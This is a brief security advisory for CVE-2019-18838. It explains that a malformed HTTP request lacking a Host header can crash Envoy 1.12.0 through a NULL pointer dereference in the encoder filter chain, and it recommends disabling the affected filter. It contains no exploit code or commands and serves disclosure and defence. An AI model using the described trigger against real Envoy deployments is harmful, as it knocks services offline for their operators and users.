CVE-2019-18838

Name of the Vulnerable Software and Affected Versions Envoy version 1.12.0

Description An issue was discovered where upon receipt of a malformed HTTP request without a Host header, Envoy sends an internally generated "Invalid request" response. This response is dispatched through the configured encoder filter chain before being sent to the client. If an encoder filter invokes route manager APIs that access a request's Host header, it causes a NULL pointer dereference, resulting in abnormal termination of the Envoy process.

Recommendations For Envoy version 1.12.0, consider disabling the encoder filter that invokes route manager APIs until a patch is available to prevent abnormal termination of the Envoy process.